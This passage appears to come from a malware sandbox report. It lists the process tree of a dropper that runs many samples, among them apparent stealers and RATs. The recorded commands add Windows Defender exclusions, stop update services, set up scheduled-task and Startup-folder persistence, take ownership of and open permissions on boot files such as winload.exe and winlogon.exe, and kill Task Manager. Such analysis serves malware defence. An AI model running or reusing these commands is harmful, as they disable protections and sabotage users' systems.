        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        14⤵
        
        PID:6728
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sLk2gUNdL8e5.bat" "
        15⤵
        
        PID:11868
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:11668
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6396
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        16⤵
        
        PID:5672
    - - C:\Users\Admin\Desktop\Files\twztl.exe
        
        "C:\Users\Admin\Desktop\Files\twztl.exe"
        5⤵
        
        PID:7940
    - - C:\Users\Admin\Desktop\Files\ggg.exe
        
        "C:\Users\Admin\Desktop\Files\ggg.exe"
        5⤵
        
        PID:9300
      - C:\Users\Admin\Desktop\Files\ggg.exe
        
        "C:\Users\Admin\Desktop\Files\ggg.exe"
        6⤵
        
        PID:7204
    - - C:\Users\Admin\Desktop\Files\1_encoded.exe
        
        "C:\Users\Admin\Desktop\Files\1_encoded.exe"
        5⤵
        
        PID:9548
    - - C:\Users\Admin\Desktop\Files\SemiconductorNot.exe
        
        "C:\Users\Admin\Desktop\Files\SemiconductorNot.exe"
        5⤵
        
        PID:10148
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit
        6⤵
        
        PID:6652
    - - C:\Users\Admin\Desktop\Files\kill.exe
        
        "C:\Users\Admin\Desktop\Files\kill.exe"
        5⤵
        
        PID:10236
      - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        6⤵
        
        PID:8384
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8384 -s 1140
        7⤵
        Program crash
        
        PID:9536
    - - C:\Users\Admin\Desktop\Files\minecraft.exe
        
        "C:\Users\Admin\Desktop\Files\minecraft.exe"
        5⤵
        
        PID:6716
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B471.tmp\B472.tmp\B473.bat C:\Users\Admin\Desktop\Files\minecraft.exe"
        6⤵
        
        PID:8016
        
        C:\Windows\system32\fsutil.exe
        
        fsutil dirty query C:
        7⤵
        
        PID:5520
        
        C:\Windows\System32\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        7⤵
        Kills process with taskkill
        
        PID:5472
        
        C:\Windows\System32\icacls.exe
        
        icacls C:\Windows\System32\hal.dll /grant everyone:F /t
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5488
        
        C:\Windows\System32\takeown.exe
        
        takeown /f C:\Windows\System32\winload.exe /r /d y
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:32
        
        C:\Windows\System32\icacls.exe
        
        icacls C:\Windows\System32\winload.exe /grant everyone:F /t
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3804
        
        C:\Windows\System32\takeown.exe
        
        takeown /f C:\Windows\System32\winresume.exe /r /d y
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:11440
        
        C:\Windows\System32\icacls.exe
        
        icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6084
        
        C:\Windows\System32\takeown.exe
        
        takeown /f C:\Windows\System32\winlogon.exe /r /d y
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:10424
        
        C:\Windows\System32\icacls.exe
        
        icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3580
    - - C:\Users\Admin\Desktop\Files\stail.exe
        
        "C:\Users\Admin\Desktop\Files\stail.exe"
        5⤵
        
        PID:7552
      - C:\Users\Admin\AppData\Local\Temp\is-9FD6K.tmp\stail.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9FD6K.tmp\stail.tmp" /SL5="$C0360,3823954,54272,C:\Users\Admin\Desktop\Files\stail.exe"
        6⤵
        
        PID:9876
        
        C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" pause beauty_guide_11183
        7⤵
        
        PID:7064
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause beauty_guide_11183
        8⤵
        
        PID:7284
        
        C:\Users\Admin\AppData\Local\Beauty Guide 2.2.9\BeautyGuide.exe
        
        "C:\Users\Admin\AppData\Local\Beauty Guide 2.2.9\BeautyGuide.exe" -i
        7⤵
        
        PID:9808
    - - C:\Users\Admin\Desktop\Files\18ijuw13.exe
        
        "C:\Users\Admin\Desktop\Files\18ijuw13.exe"
        5⤵
        
        PID:8684
    - - C:\Users\Admin\Desktop\Files\kp8dnpa9.exe
        
        "C:\Users\Admin\Desktop\Files\kp8dnpa9.exe"
        5⤵
        
        PID:8876
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8876 -s 272
        6⤵
        Program crash
        
        PID:9256
    - - C:\Users\Admin\Desktop\Files\bqkriy6l.exe
        
        "C:\Users\Admin\Desktop\Files\bqkriy6l.exe"
        5⤵
        
        PID:4568
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:2576
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        
        "Powershell" Copy-Item 'C:\Users\Admin\Desktop\Files\bqkriy6l.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe'
        6⤵
        
        PID:9128
    - - C:\Users\Admin\Desktop\Files\Utility3.exe
        
        "C:\Users\Admin\Desktop\Files\Utility3.exe"
        5⤵
        
        PID:7640
    - - C:\Users\Admin\Desktop\Files\Setup2.exe
        
        "C:\Users\Admin\Desktop\Files\Setup2.exe"
        5⤵
        
        PID:172
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 172 -s 1296
        6⤵
        Program crash
        
        PID:11904
    - - C:\Users\Admin\Desktop\Files\87f3f2.exe
        
        "C:\Users\Admin\Desktop\Files\87f3f2.exe"
        5⤵
        
        PID:9968
    - - C:\Users\Admin\Desktop\Files\Mswgoudnv.exe
        
        "C:\Users\Admin\Desktop\Files\Mswgoudnv.exe"
        5⤵
        
        PID:2272
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5764 -s 1232
        5⤵
        Program crash
        
        PID:8992
  - - C:\Users\Admin\Desktop\4363463463464363463463463.exe
      "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:6128
    - - C:\Users\Admin\Desktop\Files\bin.exe
        
        "C:\Users\Admin\Desktop\Files\bin.exe"
        5⤵
        
        PID:1840
      - C:\Windows\SysWOW64\netbtugc.exe
        
        "C:\Windows\SysWOW64\netbtugc.exe"
        6⤵
        
        PID:8320
    - - C:\Users\Admin\Desktop\Files\uhigdbf.exe
        
        "C:\Users\Admin\Desktop\Files\uhigdbf.exe"
        5⤵
        
        PID:4280
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
        6⤵
        
        PID:2076
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe
        
        clamer.exe -priverdD
        7⤵
        
        PID:4648
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\fseawd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\fseawd.exe"
        8⤵
        
        PID:6048
    - - C:\Users\Admin\Desktop\Files\m.exe
        
        "C:\Users\Admin\Desktop\Files\m.exe"
        5⤵
        
        PID:2700
      - C:\Windows\sysvplervcs.exe
        
        C:\Windows\sysvplervcs.exe
        6⤵
        
        PID:5416
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        7⤵
        
        PID:6764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6848
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        7⤵
        
        PID:6792
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        8⤵
        Launches sc.exe
        
        PID:6964
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        8⤵
        Launches sc.exe
        
        PID:7000
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        8⤵
        Launches sc.exe
        
        PID:7044
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        8⤵
        Launches sc.exe
        
        PID:6120
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        8⤵
        Launches sc.exe
        
        PID:6260
        
        C:\Users\Admin\AppData\Local\Temp\2544920310.exe
        
        C:\Users\Admin\AppData\Local\Temp\2544920310.exe
        7⤵
        
        PID:8996
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        8⤵
        
        PID:7260
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        9⤵
        
        PID:3048
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        8⤵
        
        PID:5768
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        9⤵
        
        PID:7248
        
        C:\Users\Admin\AppData\Local\Temp\1035513820.exe
        
        C:\Users\Admin\AppData\Local\Temp\1035513820.exe
        7⤵
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\198957278.exe
        
        C:\Users\Admin\AppData\Local\Temp\198957278.exe
        7⤵
        
        PID:9296
        
        C:\Users\Admin\AppData\Local\Temp\279723546.exe
        
        C:\Users\Admin\AppData\Local\Temp\279723546.exe
        7⤵
        
        PID:5576
    - - C:\Users\Admin\Desktop\Files\Ammyy.exe
        
        "C:\Users\Admin\Desktop\Files\Ammyy.exe"
        5⤵
        
        PID:888
    - - C:\Users\Admin\Desktop\Files\Unit.exe
        
        "C:\Users\Admin\Desktop\Files\Unit.exe"
        5⤵
        
        PID:3396
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3396 -s 484
        6⤵
        Program crash
        
        PID:6232
    - - C:\Users\Admin\Desktop\Files\peinf.exe
        
        "C:\Users\Admin\Desktop\Files\peinf.exe"
        5⤵
        
        PID:6316
    - - C:\Users\Admin\Desktop\Files\BitcoinCore.exe
        
        "C:\Users\Admin\Desktop\Files\BitcoinCore.exe"
        5⤵
        
        PID:7448
    - - C:\Users\Admin\Desktop\Files\Installeraus.exe
        
        "C:\Users\Admin\Desktop\Files\Installeraus.exe"
        5⤵
        
        PID:8964
      - C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe
        
        "C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe" -fullinstall
        6⤵
        
        PID:8368
    - - C:\Users\Admin\Desktop\Files\s.exe
        
        "C:\Users\Admin\Desktop\Files\s.exe"
        5⤵
        
        PID:6516
    - - C:\Users\Admin\Desktop\Files\win.exe
        
        "C:\Users\Admin\Desktop\Files\win.exe"
        5⤵
        
        PID:8812
    - - C:\Users\Admin\Desktop\Files\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe
        
        "C:\Users\Admin\Desktop\Files\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe"
        5⤵
        
        PID:728
    - - C:\Users\Admin\Desktop\Files\1.exe
        
        "C:\Users\Admin\Desktop\Files\1.exe"
        5⤵
        
        PID:6860
    - - C:\Users\Admin\Desktop\Files\crss.exe
        
        "C:\Users\Admin\Desktop\Files\crss.exe"
        5⤵
        
        PID:1524
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\crss.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6264
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7136
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11504
    - - C:\Users\Admin\Desktop\Files\seksiak.exe
        
        "C:\Users\Admin\Desktop\Files\seksiak.exe"
        5⤵
        
        PID:6196
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7260
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Kx2cHnVjCSqP.bat" "
        6⤵
        
        PID:6084
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:6376
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8016
        
        C:\Users\Admin\Desktop\Files\seksiak.exe
        
        "C:\Users\Admin\Desktop\Files\seksiak.exe"
        7⤵
        
        PID:8116
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vhqPXPb6pQ68.bat" "
        8⤵
        
        PID:7096
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:5520
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4628
    - - C:\Users\Admin\Desktop\Files\winbox.exe
        
        "C:\Users\Admin\Desktop\Files\winbox.exe"
        5⤵
        
        PID:9928
    - - C:\Users\Admin\Desktop\Files\AsyncClient.exe
        
        "C:\Users\Admin\Desktop\Files\AsyncClient.exe"
        5⤵
        
        PID:7288
    - - C:\Users\Admin\Desktop\Files\winx86.exe
        
        "C:\Users\Admin\Desktop\Files\winx86.exe"
        5⤵
        
        PID:6504
      - C:\Users\Admin\Desktop\Files\winx86.exe
        
        C:\Users\Admin\Desktop\Files\winx86.exe detached
        6⤵
        
        PID:6916
    - - C:\Users\Admin\Desktop\Files\Meredrop.exe
        
        "C:\Users\Admin\Desktop\Files\Meredrop.exe"
        5⤵
        
        PID:9944
    - - C:\Users\Admin\Desktop\Files\Indentif.exe
        
        "C:\Users\Admin\Desktop\Files\Indentif.exe"
        5⤵
        
        PID:9440
    - - C:\Users\Admin\Desktop\Files\j4vzzuai.exe
        
        "C:\Users\Admin\Desktop\Files\j4vzzuai.exe"
        5⤵
        
        PID:7272
      - C:\Users\Admin\Desktop\Files\j4vzzuai.exe
        
        "C:\Users\Admin\Desktop\Files\j4vzzuai.exe"
        6⤵
        
        PID:5512
      - C:\Users\Admin\Desktop\Files\j4vzzuai.exe
        
        "C:\Users\Admin\Desktop\Files\j4vzzuai.exe"
        6⤵
        
        PID:7692
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7272 -s 308
        6⤵
        Program crash
        
        PID:5504
    - - C:\Users\Admin\Desktop\Files\nano.exe
        
        "C:\Users\Admin\Desktop\Files\nano.exe"
        5⤵
        
        PID:11056
    - - C:\Users\Admin\Desktop\Files\XM.exe
        
        "C:\Users\Admin\Desktop\Files\XM.exe"
        5⤵
        
        PID:12012
    - - C:\Users\Admin\Desktop\Files\Opdxdyeul.exe
        
        "C:\Users\Admin\Desktop\Files\Opdxdyeul.exe"
        5⤵
        
        PID:8976
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8976 -s 236
        6⤵
        Program crash
        
        PID:8480
    - - C:\Users\Admin\Desktop\Files\aaa.exe
        
        "C:\Users\Admin\Desktop\Files\aaa.exe"
        5⤵
        
        PID:6752
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        5⤵
        
        PID:9376
    - - C:\Users\Admin\Desktop\Files\soft.exe
        
        "C:\Users\Admin\Desktop\Files\soft.exe"
        5⤵
        
        PID:3552
    - - C:\Users\Admin\Desktop\Files\robotic.exe
        
        "C:\Users\Admin\Desktop\Files\robotic.exe"
        5⤵
        
        PID:6420
    - - C:\Users\Admin\Desktop\Files\morphic.exe
        
        "C:\Users\Admin\Desktop\Files\morphic.exe"
        5⤵
        
        PID:5668
    - - C:\Users\Admin\Desktop\Files\System.exe
        
        "C:\Users\Admin\Desktop\Files\System.exe"
        5⤵
        
        PID:1456
      - C:\Users\Admin\Desktop\Files\._cache_System.exe
        
        "C:\Users\Admin\Desktop\Files\._cache_System.exe"
        6⤵
        
        PID:9692
      - C:\ProgramData\Synaptics\Synaptics.exe
        
        "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
        6⤵
        
        PID:12116
    - - C:\Users\Admin\Desktop\Files\drchoe.exe
        
        "C:\Users\Admin\Desktop\Files\drchoe.exe"
        5⤵
        
        PID:4808
    - - C:\Users\Admin\Desktop\Files\maza-0.16.3-win64-setup-unsigned.exe
        
        "C:\Users\Admin\Desktop\Files\maza-0.16.3-win64-setup-unsigned.exe"
        5⤵
        
        PID:12128
    - - C:\Users\Admin\Desktop\Files\zxcv.exe
        
        "C:\Users\Admin\Desktop\Files\zxcv.exe"
        5⤵
        
        PID:10268
      - C:\Users\Admin\Desktop\Files\zxcv.exe
        
        "C:\Users\Admin\Desktop\Files\zxcv.exe"
        6⤵
        
        PID:6596
        
        C:\Users\Admin\AppData\Roaming\Lm94hGzCys.exe
        
        "C:\Users\Admin\AppData\Roaming\Lm94hGzCys.exe"
        7⤵
        
        PID:11604
        
        C:\Users\Admin\AppData\Roaming\4pBUn447yZ.exe
        
        "C:\Users\Admin\AppData\Roaming\4pBUn447yZ.exe"
        7⤵
        
        PID:4616
    - - C:\Users\Admin\Desktop\Files\Ghost_0x000263826B9A9B91.exe
        
        "C:\Users\Admin\Desktop\Files\Ghost_0x000263826B9A9B91.exe"
        5⤵
        
        PID:2220
    - - C:\Users\Admin\Desktop\Files\steal_stub.exe
        
        "C:\Users\Admin\Desktop\Files\steal_stub.exe"
        5⤵
        
        PID:9072
    - - C:\Users\Admin\Desktop\Files\c1.exe
        
        "C:\Users\Admin\Desktop\Files\c1.exe"
        5⤵
        
        PID:11828
  - - C:\Users\Admin\Desktop\4363463463464363463463463.exe
      "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
      4⤵
      PID:392
    - - C:\Users\Admin\Desktop\Files\11.exe
        
        "C:\Users\Admin\Desktop\Files\11.exe"
        5⤵
        
        PID:3552
      - C:\Windows\sysarddrvs.exe
        
        C:\Windows\sysarddrvs.exe
        6⤵
        
        PID:6488
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        7⤵
        
        PID:6684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7052
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
        7⤵
        
        PID:6804
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        8⤵
        Launches sc.exe
        
        PID:7140
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        8⤵
        Launches sc.exe
        
        PID:6108
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        8⤵
        Launches sc.exe
        
        PID:5800
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        8⤵
        Launches sc.exe
        
        PID:6204
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        8⤵
        Launches sc.exe
        
        PID:4272
        
        C:\Users\Admin\AppData\Local\Temp\2101413903.exe
        
        C:\Users\Admin\AppData\Local\Temp\2101413903.exe
        7⤵
        
        PID:7876
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        8⤵
        
        PID:8992
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        9⤵
        
        PID:9300
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        8⤵
        
        PID:8376
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        9⤵
        
        PID:6028
        
        C:\Users\Admin\AppData\Local\Temp\1250814454.exe
        
        C:\Users\Admin\AppData\Local\Temp\1250814454.exe
        7⤵
        
        PID:7932
        
        C:\Users\Admin\AppData\Local\Temp\1542117656.exe
        
        C:\Users\Admin\AppData\Local\Temp\1542117656.exe
        7⤵
        
        PID:7792
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6488 -s 2032
        7⤵
        Program crash
        
        PID:5252
    - - C:\Users\Admin\Desktop\Files\anne.exe
        
        "C:\Users\Admin\Desktop\Files\anne.exe"
        5⤵
        
        PID:8092
    - - C:\Users\Admin\Desktop\Files\lummnew.exe
        
        "C:\Users\Admin\Desktop\Files\lummnew.exe"
        5⤵
        
        PID:7944
    - - C:\Users\Admin\Desktop\Files\mimilove.exe
        
        "C:\Users\Admin\Desktop\Files\mimilove.exe"
        5⤵
        
        PID:9452
    - - C:\Users\Admin\Desktop\Files\RuntimeBrikon.exe
        
        "C:\Users\Admin\Desktop\Files\RuntimeBrikon.exe"
        5⤵
        
        PID:9348
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Desktop\Files\RuntimeBrikon.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
        6⤵
        
        PID:9740
        
        C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Users\Admin\Desktop\Files\RuntimeBrikon.exe" MD5
        7⤵
        
        PID:1912
        
        C:\Windows\system32\find.exe
        
        find /i /v "md5"
        7⤵
        
        PID:1900
        
        C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        7⤵
        
        PID:7992
    - - C:\Users\Admin\Desktop\Files\seo.exe
        
        "C:\Users\Admin\Desktop\Files\seo.exe"
        5⤵
        
        PID:4932
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k move Vote Vote.cmd & Vote.cmd & exit
        6⤵
        
        PID:6212
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:11380
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        7⤵
        
        PID:8584
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        5⤵
        
        PID:7768
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        
        PID:9888
    - - C:\Users\Admin\Desktop\Files\up.exe
        
        "C:\Users\Admin\Desktop\Files\up.exe"
        5⤵
        
        PID:9316
    - - C:\Users\Admin\Desktop\Files\onetap.exe
        
        "C:\Users\Admin\Desktop\Files\onetap.exe"
        5⤵
        
        PID:9072
    - - C:\Users\Admin\Desktop\Files\smell-the-roses.exe
        
        "C:\Users\Admin\Desktop\Files\smell-the-roses.exe"
        5⤵
        
        PID:5784
    - - C:\Users\Admin\Desktop\Files\cudo.exe
        
        "C:\Users\Admin\Desktop\Files\cudo.exe"
        5⤵
        
        PID:1296
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:6340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svcsys'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11356
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svcsys'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9340
    - - C:\Users\Admin\Desktop\Files\OLDxTEAM.exe
        
        "C:\Users\Admin\Desktop\Files\OLDxTEAM.exe"
        5⤵
        
        PID:9500
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9500 -s 824
        6⤵
        Program crash
        
        PID:5880
    - - C:\Users\Admin\Desktop\Files\dos.exe
        
        "C:\Users\Admin\Desktop\Files\dos.exe"
        5⤵
        
        PID:6520
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:9140
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:7028
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:10076
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c <!DOCTYPE html>     <html class="no-js" lang="en-US">  <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />  <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb
        6⤵
        
        PID:4252
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:8696
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
